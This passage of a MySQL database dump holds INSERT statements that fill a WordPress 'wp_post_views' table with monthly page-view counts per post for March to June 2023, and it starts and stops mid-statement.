3),(4893,2,'202303',13),(4897,2,'202303',13),(5054,2,'202303',13),(5334,2,'202303',13),(1705,2,'202303',14),(1713,2,'202303',14),(1726,2,'202303',14),(1739,2,'202303',14),(1741,2,'202303',14),(1774,2,'202303',14),(1778,2,'202303',14),(2252,2,'202303',14),(2558,2,'202303',14),(2956,2,'202303',14),(3251,2,'202303',14),(3313,2,'202303',14),(3710,2,'202303',14),(3714,2,'202303',14),(4408,2,'202303',14),(4582,2,'202303',14),(4648,2,'202303',14),(4657,2,'202303',14),(4681,2,'202303',14),(4771,2,'202303',14),(5042,2,'202303',14),(5323,2,'202303',14),(1590,2,'202303',15),(1749,2,'202303',15),(1772,2,'202303',15),(2993,2,'202303',15),(3063,2,'202303',15),(3124,2,'202303',15),(3127,2,'202303',15),(3245,2,'202303',15),(3259,2,'202303',15),(3263,2,'202303',15),(3531,2,'202303',15),(3731,2,'202303',15),(3752,2,'202303',15),(4654,2,'202303',15),(4688,2,'202303',15),(4694,2,'202303',15),(4753,2,'202303',15),(4768,2,'202303',15),(5046,2,'202303',15),(5050,2,'202303',15),(5314,2,'202303',15),(471,2,'202303',16),(2165,2,'202303',16),(2617,2,'202303',16),(2751,2,'202303',16),(2991,2,'202303',16),(3034,2,'202303',16),(3038,2,'202303',16),(3041,2,'202303',16),(3079,2,'202303',16),(3092,2,'202303',16),(3290,2,'202303',16),(3307,2,'202303',16),(3482,2,'202303',16),(4332,2,'202303',16),(4424,2,'202303',16),(4448,2,'202303',16),(4660,2,'202303',16),(4668,2,'202303',16),(4765,2,'202303',16),(4976,2,'202303',16),(5024,2,'202303',16),(5028,2,'202303',16),(5146,2,'202303',16),(5248,2,'202303',16),(479,2,'202303',17),(1699,2,'202303',17),(1701,2,'202303',17),(1747,2,'202303',17),(1768,2,'202303',17),(1770,2,'202303',17),(1776,2,'202303',17),(2154,2,'202303',17),(2748,2,'202303',17),(2775,2,'202303',17),(2813,2,'202303',17),(3243,2,'202303',17),(3498,2,'202303',17),(3721,2,'202303',17),(3746,2,'202303',17),(3777,2,'202303',17),(4377,2,'202303',17),(4697,2,'202303',17),(4747,2,'202303',17),(4866,2,'202303',17),(4874,2,'202303',17),(5125,2,'202303',17),(5320,2,'202303',17),(476,2,'202303',18),(1584,2,'202303',18),(1715,2,'202303',18),(1737,2,'202303',18),(2148,2,'202303',18),(2150,2,'202303',18),(2293,2,'202303',18),(3006,2,'202303',18),(3261,2,'202303',18),(3285,2,'202303',18),(3430,2,'202303',18),(4329,2,'202303',18),(4444,2,'202303',18),(4517,2,'202303',18),(4566,2,'202303',18),(5131,2,'202303',18),(102,2,'202303',19);
INSERT INTO `wp_post_views` VALUES (1711,2,'202303',19),(2296,2,'202303',19),(2911,2,'202303',19),(3023,2,'202303',19),(3090,2,'202303',19),(4326,2,'202303',19),(4341,2,'202303',19),(4762,2,'202303',19),(4983,2,'202303',19),(5067,2,'202303',19),(5140,2,'202303',19),(5153,2,'202303',19),(5289,2,'202303',19),(5317,2,'202303',19),(478,2,'202303',20),(482,2,'202303',20),(2801,2,'202303',20),(3226,2,'202303',20),(3479,2,'202303',20),(3489,2,'202303',20),(3534,2,'202303',20),(4357,2,'202303',20),(4524,2,'202303',20),(4542,2,'202303',20),(4776,2,'202303',20),(4980,2,'202303',20),(5037,2,'202303',20),(5157,2,'202303',20),(481,2,'202303',21),(485,2,'202303',21),(486,2,'202303',21),(1745,2,'202303',21),(2178,2,'202303',21),(2989,2,'202303',21),(3004,2,'202303',21),(3005,2,'202303',21),(3045,2,'202303',21),(3107,2,'202303',21),(4387,2,'202303',21),(4759,2,'202303',21),(5071,2,'202303',21),(5301,2,'202303',21),(480,2,'202303',22),(483,2,'202303',22),(1703,2,'202303',22),(2248,2,'202303',22),(2965,2,'202303',22),(3486,2,'202303',22),(4420,2,'202303',22),(4529,2,'202303',22),(5101,2,'202303',22),(5137,2,'202303',22),(484,2,'202303',23),(4301,2,'202303',23),(5062,2,'202303',23),(5295,2,'202303',23),(477,2,'202303',24),(2658,2,'202303',24),(2704,2,'202303',24),(3102,2,'202303',24),(4996,2,'202303',24),(5134,2,'202303',24),(5292,2,'202303',24),(5307,2,'202303',24),(488,2,'202303',25),(2159,2,'202303',25),(2609,2,'202303',25),(3072,2,'202303',25),(3117,2,'202303',25),(5080,2,'202303',25),(469,2,'202303',26),(4416,2,'202303',26),(5122,2,'202303',26),(5264,2,'202303',26),(5271,2,'202303',26),(5304,2,'202303',26),(2769,2,'202303',27),(4335,2,'202303',27),(5298,2,'202303',27),(1614,2,'202303',28),(2297,2,'202303',28),(4556,2,'202303',28),(4612,2,'202303',28),(4703,2,'202303',28),(5268,2,'202303',28),(4323,2,'202303',29),(4391,2,'202303',29),(5310,2,'202303',29),(1604,2,'202303',31),(4238,2,'202303',32),(4412,2,'202303',32),(4608,2,'202303',32),(1606,2,'202303',33),(1722,2,'202303',33),(467,2,'202303',35),(472,2,'202303',35),(473,2,'202303',35),(4977,2,'202303',35),(474,2,'202303',37),(3060,2,'202303',37),(4700,2,'202303',37),(1592,2,'202303',38),(1766,2,'202303',38),(4722,2,'202303',39),(5259,2,'202303',39),(2503,2,'202303',41),(4454,2,'202303',41),(5076,2,'202303',41),(74,2,'202303',42),(470,2,'202303',42),(468,2,'202303',43),(1608,2,'202303',43),(3069,2,'202303',43),(487,2,'202303',44),(5280,2,'202303',45),(4709,2,'202303',46),(108,2,'202303',47),(2804,2,'202303',47),(4677,2,'202303',47),(4674,2,'202303',48),(2457,2,'202303',49),(4338,2,'202303',49),(4706,2,'202303',50),(570,2,'202303',51),(1724,2,'202303',51),(1728,2,'202303',51),(4645,2,'202303',51),(4930,2,'202303',53),(5128,2,'202303',53),(5253,2,'202303',53),(5276,2,'202303',53),(4436,2,'202303',54),(4551,2,'202303',55),(1598,2,'202303',59),(84,2,'202303',60),(3066,2,'202303',62),(4663,2,'202303',63),(5033,2,'202303',63),(5256,2,'202303',63),(3030,2,'202303',65),(1544,2,'202303',66),(1600,2,'202303',66),(87,2,'202303',67),(4520,2,'202303',67),(2809,2,'202303',68),(3781,2,'202303',73),(1588,2,'202303',75),(1602,2,'202303',77),(3083,2,'202303',80),(2309,2,'202303',86),(76,2,'202303',89),(335,2,'202303',89),(1610,2,'202303',89),(1586,2,'202303',90),(4457,2,'202303',91),(91,2,'202303',94),(1612,2,'202303',95),(1594,2,'202303',100),(68,2,'202303',105),(1582,2,'202303',107),(5163,2,'202303',108),(89,2,'202303',112),(3764,2,'202303',122),(1596,2,'202303',124),(72,2,'202303',145),(2904,2,'202303',169),(80,2,'202303',369),(9,2,'202303',2367),(106,2,'202304',4),(1695,2,'202304',5),(3269,2,'202304',5),(3724,2,'202304',5),(4363,2,'202304',5),(4591,2,'202304',5),(5020,2,'202304',5),(1699,2,'202304',6),(1720,2,'202304',6),(1726,2,'202304',6),(1768,2,'202304',6),(2993,2,'202304',6),(3109,2,'202304',6),(3249,2,'202304',6),(3278,2,'202304',6),(3280,2,'202304',6),(3541,2,'202304',6),(110,2,'202304',7),(1749,2,'202304',7),(1772,2,'202304',7),(3251,2,'202304',7),(3267,2,'202304',7),(3273,2,'202304',7),(4408,2,'202304',7),(4893,2,'202304',7),(5024,2,'202304',7),(5028,2,'202304',7),(1734,2,'202304',8),(1751,2,'202304',8),(2063,2,'202304',8),(2150,2,'202304',8),(2252,2,'202304',8),(2293,2,'202304',8),(3096,2,'202304',8),(3749,2,'202304',8),(4424,2,'202304',8),(4440,2,'202304',8),(4870,2,'202304',8),(5248,2,'202304',8),(478,2,'202304',9),(483,2,'202304',9),(1697,2,'202304',9),(1713,2,'202304',9),(1741,2,'202304',9),(1778,2,'202304',9),(1782,2,'202304',9),(2152,2,'202304',9),(2156,2,'202304',9),(3097,2,'202304',9),(3245,2,'202304',9),(3247,2,'202304',9),(3316,2,'202304',9),(3742,2,'202304',9),(4275,2,'202304',9),(4368,2,'202304',9),(4387,2,'202304',9),(4654,2,'202304',9),(4792,2,'202304',9),(4866,2,'202304',9),(4878,2,'202304',9),(4883,2,'202304',9),(4897,2,'202304',9),(1715,2,'202304',10),(1730,2,'202304',10),(1739,2,'202304',10),(1776,2,'202304',10),(1780,2,'202304',10),(3240,2,'202304',10),(3259,2,'202304',10),(3265,2,'202304',10),(3275,2,'202304',10),(3287,2,'202304',10),(3486,2,'202304',10),(3731,2,'202304',10),(3746,2,'202304',10),(4329,2,'202304',10),(4373,2,'202304',10),(4382,2,'202304',10),(4396,2,'202304',10),(4432,2,'202304',10),(4546,2,'202304',10),(4858,2,'202304',10),(4888,2,'202304',10),(5037,2,'202304',10),(1705,2,'202304',11),(1732,2,'202304',11),(1743,2,'202304',11),(2296,2,'202304',11),(2558,2,'202304',11),(2991,2,'202304',11),(3041,2,'202304',11),(3243,2,'202304',11),(3531,2,'202304',11),(3534,2,'202304',11),(3727,2,'202304',11),(4514,2,'202304',11),(4668,2,'202304',11),(4688,2,'202304',11),(4862,2,'202304',11),(5042,2,'202304',11),(471,2,'202304',12),(476,2,'202304',12),(482,2,'202304',12),(485,2,'202304',12),(1590,2,'202304',12),(1703,2,'202304',12),(1747,2,'202304',12),(2161,2,'202304',12),(2248,2,'202304',12),(3087,2,'202304',12),(3104,2,'202304',12),(3229,2,'202304',12),(3261,2,'202304',12),(3438,2,'202304',12),(3738,2,'202304',12),(3752,2,'202304',12),(4428,2,'202304',12),(4517,2,'202304',12),(4685,2,'202304',12),(5259,2,'202304',12),(477,2,'202304',13),(481,2,'202304',13),(1584,2,'202304',13),(1707,2,'202304',13),(1709,2,'202304',13),(2748,2,'202304',13),(2965,2,'202304',13),(3006,2,'202304',13),(3257,2,'202304',13),(3271,2,'202304',13),(3282,2,'202304',13),(3307,2,'202304',13),(3774,2,'202304',13),(4341,2,'202304',13),(4377,2,'202304',13),(4404,2,'202304',13),(4444,2,'202304',13),(4587,2,'202304',13),(4651,2,'202304',13),(5058,2,'202304',13),(479,2,'202304',14),(484,2,'202304',14),(488,2,'202304',14),(1774,2,'202304',14),(2964,2,'202304',14),(3034,2,'202304',14),(3124,2,'202304',14),(3253,2,'202304',14),(3263,2,'202304',14),(3489,2,'202304',14),(3721,2,'202304',14),(3735,2,'202304',14),(4332,2,'202304',14),(4566,2,'202304',14),(4648,2,'202304',14),(4802,2,'202304',14),(5050,2,'202304',14),(102,2,'202304',15),(1737,2,'202304',15),(2956,2,'202304',15),(3107,2,'202304',15),(3127,2,'202304',15),(3482,2,'202304',15),(4400,2,'202304',15),(4582,2,'202304',15),(4691,2,'202304',15),(4703,2,'202304',15),(4744,2,'202304',15),(4797,2,'202304',15),(4874,2,'202304',15),(4988,2,'202304',15),(4996,2,'202304',15),(5046,2,'202304',15),(5054,2,'202304',15),(5146,2,'202304',15),(467,2,'202304',16),(1701,2,'202304',16),(1770,2,'202304',16),(2154,2,'202304',16),(2165,2,'202304',16),(2297,2,'202304',16),(2617,2,'202304',16),(3045,2,'202304',16),(3072,2,'202304',16),(3090,2,'202304',16),(3092,2,'202304',16),(3290,2,'202304',16),(3313,2,'202304',16),(4357,2,'202304',16),(4756,2,'202304',16),(5101,2,'202304',16),(5125,2,'202304',16),(5131,2,'202304',16),(5140,2,'202304',16),(5153,2,'202304',16),(5330,2,'202304',16),(2178,2,'202304',17),(2704,2,'202304',17),(2801,2,'202304',17),(3005,2,'202304',17),(3297,2,'202304',17),(3430,2,'202304',17),(3710,2,'202304',17),(4301,2,'202304',17),(4556,2,'202304',17),(4657,2,'202304',17),(4712,2,'202304',17),(4741,2,'202304',17),(4750,2,'202304',17),(5122,2,'202304',17),(5137,2,'202304',17),(5157,2,'202304',17),(5326,2,'202304',17),(480,2,'202304',18),(2911,2,'202304',18),(3063,2,'202304',18),(3117,2,'202304',18),(3285,2,'202304',18),(3714,2,'202304',18),(4660,2,'202304',18),(4681,2,'202304',18),(4753,2,'202304',18),(486,2,'202304',19),(1718,2,'202304',19),(1722,2,'202304',19),(3226,2,'202304',19),(3498,2,'202304',19),(3777,2,'202304',19),(4326,2,'202304',19),(4697,2,'202304',19),(4762,2,'202304',19),(4768,2,'202304',19),(4980,2,'202304',19),(5289,2,'202304',19),(2775,2,'202304',20),(3027,2,'202304',20),(4420,2,'202304',20),(4524,2,'202304',20),(4612,2,'202304',20),(4694,2,'202304',20),(4747,2,'202304',20),(5067,2,'202304',20),(5080,2,'202304',20),(469,2,'202304',21),(1711,2,'202304',21),(2609,2,'202304',21),(2813,2,'202304',21),(3004,2,'202304',21),(4771,2,'202304',21),(2148,2,'202304',22),(3038,2,'202304',22),(3771,2,'202304',22),(4323,2,'202304',22),(4416,2,'202304',22),(4608,2,'202304',22),(4983,2,'202304',22),(5071,2,'202304',22),(5292,2,'202304',22),(1606,2,'202304',23),(2989,2,'202304',23),(3079,2,'202304',23),(4448,2,'202304',23),(4765,2,'202304',23),(4776,2,'202304',23),(4976,2,'202304',23),(3102,2,'202304',24),(4977,2,'202304',24),(5295,2,'202304',24),(3479,2,'202304',25),(5062,2,'202304',25),(472,2,'202304',26),(2159,2,'202304',26),(1766,2,'202304',27),(2751,2,'202304',27),(2769,2,'202304',27),(4391,2,'202304',27),(4759,2,'202304',27),(5134,2,'202304',27),(5268,2,'202304',27),(5298,2,'202304',27),(4454,2,'202304',28),(5271,2,'202304',28),(5301,2,'202304',28),(5310,2,'202304',28),(1614,2,'202304',29),(1745,2,'202304',29),(5304,2,'202304',29),(4335,2,'202304',30),(4709,2,'202304',30),(2457,2,'202304',31),(4529,2,'202304',31),(4542,2,'202304',31),(474,2,'202304',33),(3060,2,'202304',33),(5314,2,'202304',33),(487,2,'202304',34),(2658,2,'202304',34),(4663,2,'202304',34),(4722,2,'202304',34),(5076,2,'202304',34),(5253,2,'202304',34),(3023,2,'202304',35),(5307,2,'202304',35),(1604,2,'202304',36),(3069,2,'202304',36),(4338,2,'202304',36),(5128,2,'202304',36),(5280,2,'202304',37),(473,2,'202304',39),(4674,2,'202304',40),(4700,2,'202304',40),(5264,2,'202304',40),(470,2,'202304',41),(4677,2,'202304',41),(4238,2,'202304',42),(1608,2,'202304',43),(4551,2,'202304',43),(4436,2,'202304',44),(5323,2,'202304',45),(468,2,'202304',46),(5256,2,'202304',46),(1724,2,'202304',48),(4520,2,'202304',48),(4645,2,'202304',48),(5320,2,'202304',48),(108,2,'202304',49),(1592,2,'202304',49),(5317,2,'202304',49),(74,2,'202304',50),(3030,2,'202304',50),(570,2,'202304',51),(1600,2,'202304',51),(4412,2,'202304',51),(5276,2,'202304',51),(1598,2,'202304',52),(1602,2,'202304',53),(2503,2,'202304',55),(84,2,'202304',56),(2804,2,'202304',60),(4457,2,'202304',60),(5033,2,'202304',61),(5334,2,'202304',64),(87,2,'202304',69),(1728,2,'202304',69),(3066,2,'202304',70),(4930,2,'202304',72),(1610,2,'202304',76),(1544,2,'202304',77),(3781,2,'202304',77),(4706,2,'202304',77),(3083,2,'202304',81),(1588,2,'202304',82),(2309,2,'202304',83),(2809,2,'202304',85),(1596,2,'202304',86),(76,2,'202304',89),(335,2,'202304',89),(1586,2,'202304',90),(1612,2,'202304',92),(1594,2,'202304',94),(91,2,'202304',95),(89,2,'202304',100),(68,2,'202304',104),(1582,2,'202304',112),(3764,2,'202304',112),(2904,2,'202304',126),(5163,2,'202304',129),(72,2,'202304',136),(80,2,'202304',550),(9,2,'202304',2909),(106,2,'202305',11),(1720,2,'202305',12),(1741,2,'202305',12),(1697,2,'202305',13),(1705,2,'202305',13),(1715,2,'202305',13),(2161,2,'202305',13),(3104,2,'202305',13),(110,2,'202305',14),(1695,2,'202305',14),(1699,2,'202305',14),(3269,2,'202305',14),(3280,2,'202305',14),(3541,2,'202305',14),(4368,2,'202305',14),(4408,2,'202305',14),(4802,2,'202305',14),(1713,2,'202305',15),(1732,2,'202305',15),(2252,2,'202305',15),(3097,2,'202305',15),(3109,2,'202305',15),(3251,2,'202305',15),(3257,2,'202305',15),(4382,2,'202305',15),(4440,2,'202305',15),(4591,2,'202305',15),(4797,2,'202305',15),(4862,2,'202305',15),(4870,2,'202305',15),(5137,2,'202305',15),(1701,2,'202305',16),(1739,2,'202305',16),(1751,2,'202305',16),(1768,2,'202305',16),(1772,2,'202305',16),(2063,2,'202305',16),(2293,2,'202305',16),(3249,2,'202305',16),(3263,2,'202305',16),(3265,2,'202305',16),(3287,2,'202305',16),(4377,2,'202305',16),(4387,2,'202305',16),(4424,2,'202305',16),(4432,2,'202305',16),(4897,2,'202305',16),(1707,2,'202305',17),(1730,2,'202305',17),(1734,2,'202305',17),(1737,2,'202305',17),(1743,2,'202305',17),(1776,2,'202305',17),(2152,2,'202305',17),(2248,2,'202305',17),(2993,2,'202305',17),(3267,2,'202305',17),(3271,2,'202305',17),(3282,2,'202305',17),(3774,2,'202305',17),(4546,2,'202305',17),(4792,2,'202305',17),(4888,2,'202305',17),(1709,2,'202305',18),(2150,2,'202305',18),(2558,2,'202305',18),(2748,2,'202305',18),(3038,2,'202305',18),(3041,2,'202305',18),(3096,2,'202305',18),(3117,2,'202305',18),(3247,2,'202305',18),(3253,2,'202305',18),(3261,2,'202305',18),(3714,2,'202305',18),(4363,2,'202305',18),(4400,2,'202305',18),(4428,2,'202305',18),(4514,2,'202305',18),(4648,2,'202305',18),(4651,2,'202305',18),(4883,2,'202305',18),(5020,2,'202305',18),(488,2,'202305',19),(1726,2,'202305',19),(1782,2,'202305',19),(2297,2,'202305',19),(2704,2,'202305',19),(3027,2,'202305',19),(3079,2,'202305',19),(3229,2,'202305',19),(3243,2,'202305',19),(3245,2,'202305',19),(3297,2,'202305',19),(3438,2,'202305',19),(3534,2,'202305',19),(4275,2,'202305',19),(4329,2,'202305',19),(4373,2,'202305',19),(4396,2,'202305',19),(4587,2,'202305',19),(4668,2,'202305',19),(4681,2,'202305',19),(4688,2,'202305',19),(5050,2,'202305',19),(5146,2,'202305',19),(102,2,'202305',20),(481,2,'202305',20),(483,2,'202305',20),(485,2,'202305',20),(1590,2,'202305',20),(1747,2,'202305',20),(1780,2,'202305',20),(2296,2,'202305',20),(2965,2,'202305',20),(3023,2,'202305',20),(3063,2,'202305',20),(3087,2,'202305',20),(3285,2,'202305',20),(3430,2,'202305',20),(3531,2,'202305',20),(3742,2,'202305',20),(4404,2,'202305',20),(4556,2,'202305',20),(4691,2,'202305',20),(4712,2,'202305',20),(4858,2,'202305',20),(4893,2,'202305',20),(5046,2,'202305',20),(5248,2,'202305',20),(3006,2,'202305',21),(3316,2,'202305',21),(3727,2,'202305',21),(3731,2,'202305',21),(3749,2,'202305',21),(4517,2,'202305',21),(4741,2,'202305',21),(4771,2,'202305',21),(4878,2,'202305',21),(5028,2,'202305',21),(5042,2,'202305',21),(5271,2,'202305',21),(5289,2,'202305',21),(1770,2,'202305',22),(2148,2,'202305',22),(2156,2,'202305',22),(2178,2,'202305',22),(2751,2,'202305',22),(2964,2,'202305',22),(3259,2,'202305',22),(3275,2,'202305',22),(3278,2,'202305',22),(3307,2,'202305',22),(3479,2,'202305',22),(3482,2,'202305',22),(3721,2,'202305',22),(3735,2,'202305',22),(3771,2,'202305',22),(4357,2,'202305',22),(4874,2,'202305',22),(4983,2,'202305',22),(5058,2,'202305',22),(5101,2,'202305',22),(5125,2,'202305',22),(5330,2,'202305',22),(478,2,'202305',23),(482,2,'202305',23),(1778,2,'202305',23),(2154,2,'202305',23),(2991,2,'202305',23),(3005,2,'202305',23),(3124,2,'202305',23),(3226,2,'202305',23),(3273,2,'202305',23),(3489,2,'202305',23),(3746,2,'202305',23),(3752,2,'202305',23),(4444,2,'202305',23),(4524,2,'202305',23),(4566,2,'202305',23),(4582,2,'202305',23),(4685,2,'202305',23),(4694,2,'202305',23),(4722,2,'202305',23),(4750,2,'202305',23),(4866,2,'202305',23),(4988,2,'202305',23),(5080,2,'202305',23),(5326,2,'202305',23),(3034,2,'202305',24),(3127,2,'202305',24),(3710,2,'202305',24),(4326,2,'202305',24),(4332,2,'202305',24),(4654,2,'202305',24),(4703,2,'202305',24),(4744,2,'202305',24),(4756,2,'202305',24),(5024,2,'202305',24),(5037,2,'202305',24),(5131,2,'202305',24),(5268,2,'202305',24),(2911,2,'202305',25),(3072,2,'202305',25),(3092,2,'202305',25),(3313,2,'202305',25),(3486,2,'202305',25),(4335,2,'202305',25),(4612,2,'202305',25),(4697,2,'202305',25),(4706,2,'202305',25),(4747,2,'202305',25),(4977,2,'202305',25),(5157,2,'202305',25),(5259,2,'202305',25),(5292,2,'202305',25),(476,2,'202305',26),(479,2,'202305',26),(2775,2,'202305',26),(2801,2,'202305',26),(2813,2,'202305',26),(3045,2,'202305',26),(4323,2,'202305',26),(4341,2,'202305',26),(4454,2,'202305',26),(4660,2,'202305',26),(4996,2,'202305',26),(5140,2,'202305',26),(5153,2,'202305',26),(477,2,'202305',27),(1703,2,'202305',27),(1774,2,'202305',27),(3004,2,'202305',27),(3777,2,'202305',27),(4529,2,'202305',27),(4657,2,'202305',27),(4762,2,'202305',27),(4765,2,'202305',27),(5054,2,'202305',27),(5067,2,'202305',27),(480,2,'202305',28),(3240,2,'202305',28),(3498,2,'202305',28),(3724,2,'202305',28),(4542,2,'202305',28),(4768,2,'202305',28),(5298,2,'202305',28),(471,2,'202305',29),(1749,2,'202305',29),(2165,2,'202305',29),(2617,2,'202305',29),(2956,2,'202305',29),(2989,2,'202305',29),(3738,2,'202305',29),(4759,2,'202305',29),(5122,2,'202305',29),(5134,2,'202305',29),(5301,2,'202305',29),(484,2,'202305',30),(1724,2,'202305',30),(3102,2,'202305',30),(4753,2,'202305',30),(4976,2,'202305',30),(2658,2,'202305',31),(5356,2,'202305',31),(486,2,'202305',32),(4301,2,'202305',32),(4436,2,'202305',32),(5310,2,'202305',32),(467,2,'202305',33),(5062,2,'202305',33),(1766,2,'202305',34),(4776,2,'202305',34),(4980,2,'202305',34),(5071,2,'202305',34),(5323,2,'202305',34),(5353,2,'202305',34),(1584,2,'202305',35),(3107,2,'202305',35),(570,2,'202305',36),(5253,2,'202305',36),(5280,2,'202305',36),(5314,2,'202305',36),(469,2,'202305',37),(3060,2,'202305',37),(5128,2,'202305',37),(474,2,'202305',38),(1711,2,'202305',38),(1722,2,'202305',38),(5359,2,'202305',38),(2609,2,'202305',39),(4663,2,'202305',39),(5320,2,'202305',39),(2159,2,'202305',40),(4338,2,'202305',40),(4645,2,'202305',40),(2769,2,'202305',41),(3090,2,'202305',41),(4674,2,'202305',41),(4709,2,'202305',41),(468,2,'202305',42),(487,2,'202305',42),(5256,2,'202305',42),(5276,2,'202305',42),(5295,2,'202305',42),(472,2,'202305',43),(1745,2,'202305',43),(4238,2,'202305',43),(4420,2,'202305',43),(5076,2,'202305',43),(473,2,'202305',44),(4391,2,'202305',44),(4700,2,'202305',44),(1614,2,'202305',45),(4416,2,'202305',45),(4608,2,'202305',45),(3290,2,'202305',46),(4551,2,'202305',46),(5317,2,'202305',46),(74,2,'202305',47),(1718,2,'202305',47),(3069,2,'202305',47),(5304,2,'202305',47),(4448,2,'202305',48),(1604,2,'202305',50),(1606,2,'202305',50),(2804,2,'202305',50),(4520,2,'202305',50),(5307,2,'202305',50),(3066,2,'202305',51),(5264,2,'202305',52),(1592,2,'202305',53),(4677,2,'202305',53),(5033,2,'202305',53),(470,2,'202305',54),(87,2,'202305',57),(1598,2,'202305',57),(2457,2,'202305',57),(4457,2,'202305',60),(84,2,'202305',61),(3083,2,'202305',61),(108,2,'202305',62),(1608,2,'202305',62),(5334,2,'202305',62),(1544,2,'202305',63),(1610,2,'202305',63),(1602,2,'202305',64),(2503,2,'202305',65),(3030,2,'202305',66),(2309,2,'202305',67),(1728,2,'202305',68),(3764,2,'202305',68),(335,2,'202305',70),(1600,2,'202305',70),(1612,2,'202305',70),(4412,2,'202305',73),(2809,2,'202305',75),(3781,2,'202305',77),(4930,2,'202305',79),(91,2,'202305',81),(1594,2,'202305',82),(76,2,'202305',84),(5163,2,'202305',98),(1588,2,'202305',102),(1596,2,'202305',103),(1586,2,'202305',104),(68,2,'202305',118),(1582,2,'202305',119),(89,2,'202305',120),(72,2,'202305',189),(2904,2,'202305',421),(80,2,'202305',656),(9,2,'202305',3399),(106,2,'202306',5),(110,2,'202306',5),(3096,2,'202306',7),(3249,2,'202306',7),(4275,2,'202306',7),(1726,2,'202306',8),(2252,2,'202306',8),(3247,2,'202306',8),(4432,2,'202306',8),(4668,2,'202306',8),(4878,2,'202306',8),(1780,2,'202306',9),(3109,2,'202306',9),(3430,2,'202306',9),(4387,2,'202306',9),(4591,2,'202306',9),(4862,2,'202306',9),(5020,2,'202306',9),(5028,2,'202306',9),(2248,2,'202306',10),(3259,2,'202306',10),(3267,2,'202306',10),(3278,2,'202306',10),(3280,2,'202306',10),(3727,2,'202306',10),(4404,2,'202306',10),(4428,2,'202306',10),(4858,2,'202306',10),(4883,2,'202306',10),(5024,2,'202306',10),(5042,2,'202306',10),(1701,2,'202306',11),(1732,2,'202306',11),(1734,2,'202306',11),(3087,2,'202306',11),(3097,2,'202306',11),(3104,2,'202306',11),(3269,2,'202306',11),(3287,2,'202306',11),(3731,2,'202306',11),(3749,2,'202306',11),(4329,2,'202306',11),(4357,2,'202306',11),(4408,2,'202306',11),(4546,2,'202306',11),(4691,2,'202306',11),(4792,2,'202306',11),(5330,2,'202306',11),(471,2,'202306',12),(1699,2,'202306',12),(1713,2,'202306',12),(1715,2,'202306',12),(1741,2,'202306',12),(1743,2,'202306',12),(1747,2,'202306',12),(2293,2,'202306',12),(2991,2,'202306',12),(3027,2,'202306',12),(3257,2,'202306',12),(3261,2,'202306',12),(3265,2,'202306',12),(3271,2,'202306',12),(3316,2,'202306',12),(3746,2,'202306',12),(4326,2,'202306',12),(4373,2,'202306',12),(4396,2,'202306',12),(4517,2,'202306',12),(4688,2,'202306',12),(4712,2,'202306',12),(4797,2,'202306',12),(4802,2,'202306',12),(5037,2,'202306',12),(5101,2,'202306',12),(5259,2,'202306',12),(483,2,'202306',13),(1695,2,'202306',13),(1697,2,'202306',13),(1705,2,'202306',13),(1730,2,'202306',13),(1739,2,'202306',13),(1749,2,'202306',13),(1751,2,'202306',13),(1770,2,'202306',13),(1782,2,'202306',13),(2063,2,'202306',13),(2156,2,'202306',13),(2993,2,'202306',13),(3240,2,'202306',13),(3243,2,'202306',13),(3253,2,'202306',13),(3273,2,'202306',13),(3275,2,'202306',13),(3479,2,'202306',13),(4338,2,'202306',13),(4363,2,'202306',13),(4368,2,'202306',13),(4382,2,'202306',13),(4424,2,'202306',13),(4440,2,'202306',13),(4514,2,'202306',13),(4648,2,'202306',13),(4685,2,'202306',13),(4697,2,'202306',13),(4741,2,'202306',13),(4874,2,'202306',13),(5140,2,'202306',13),(5153,2,'202306',13),(5157,2,'202306',13),(5326,2,'202306',13),(482,2,'202306',14),(1720,2,'202306',14),(1768,2,'202306',14),(1772,2,'202306',14),(2748,2,'202306',14),(3023,2,'202306',14),(3041,2,'202306',14),(3063,2,'202306',14),(3285,2,'202306',14),(3531,2,'202306',14),(3721,2,'202306',14),(3735,2,'202306',14),(3742,2,'202306',14),(3752,2,'202306',14),(3771,2,'202306',14),(4332,2,'202306',14),(4377,2,'202306',14),(4681,2,'202306',14),(4756,2,'202306',14),(4866,2,'202306',14),(4870,2,'202306',14),(4888,2,'202306',14),(4897,2,'202306',14),(5046,2,'202306',14),(5050,2,'202306',14),(5054,2,'202306',14),(5271,2,'202306',14),(5363,2,'202306',14),(1703,2,'202306',15),(1776,2,'202306',15),(2161,2,'202306',15),(2296,2,'202306',15),(2617,2,'202306',15),(2813,2,'202306',15),(3489,2,'202306',15),(3541,2,'202306',15),(3724,2,'202306',15),(4694,2,'202306',15),(4722,2,'202306',15),(4750,2,'202306',15),(4988,2,'202306',15),(5146,2,'202306',15),(5301,2,'202306',15),(1737,2,'202306',16),(1778,2,'202306',16),(2150,2,'202306',16),(2297,2,'202306',16),(2558,2,'202306',16),(3263,2,'202306',16),(3307,2,'202306',16),(3438,2,'202306',16),(4335,2,'202306',16),(4556,2,'202306',16),(4566,2,'202306',16),(4703,2,'202306',16),(2775,2,'202306',17),(2801,2,'202306',17),(2965,2,'202306',17),(2989,2,'202306',17),(3079,2,'202306',17),(3229,2,'202306',17),(4454,2,'202306',17),(4582,2,'202306',17),(4654,2,'202306',17),(4776,2,'202306',17),(4893,2,'202306',17),(4983,2,'202306',17),(5058,2,'202306',17),(5248,2,'202306',17),(476,2,'202306',18),(480,2,'202306',18),(481,2,'202306',18),(485,2,'202306',18),(1707,2,'202306',18),(1709,2,'202306',18),(2964,2,'202306',18),(3006,2,'202306',18),(3034,2,'202306',18),(3092,2,'202306',18),(3127,2,'202306',18),(3251,2,'202306',18),(3282,2,'202306',18),(3482,2,'202306',18),(3486,2,'202306',18),(3738,2,'202306',18),(3774,2,'202306',18),(4400,2,'202306',18),(4660,2,'202306',18),(4996,2,'202306',18),(5289,2,'202306',18),(477,2,'202306',19),(2956,2,'202306',19),(3117,2,'202306',19),(3226,2,'202306',19),(3498,2,'202306',19),(4744,2,'202306',19),(4759,2,'202306',19),(4976,2,'202306',19),(5067,2,'202306',19),(5128,2,'202306',19),(5134,2,'202306',19),(5137,2,'202306',19),(5298,2,'202306',19),(478,2,'202306',20),(479,2,'202306',20),(1590,2,'202306',20),(2165,2,'202306',20),(2911,2,'202306',20),(3066,2,'202306',20),(3290,2,'202306',20),(3534,2,'202306',20),(4587,2,'202306',20),(4612,2,'202306',20),(4677,2,'202306',20),(102,2,'202306',21),(2148,2,'202306',21),(2154,2,'202306',21),(2704,2,'202306',21),(3072,2,'202306',21),(3124,2,'202306',21),(3710,2,'202306',21),(3714,2,'202306',21),(4323,2,'202306',21),(4444,2,'202306',21),(4542,2,'202306',21),(4651,2,'202306',21),(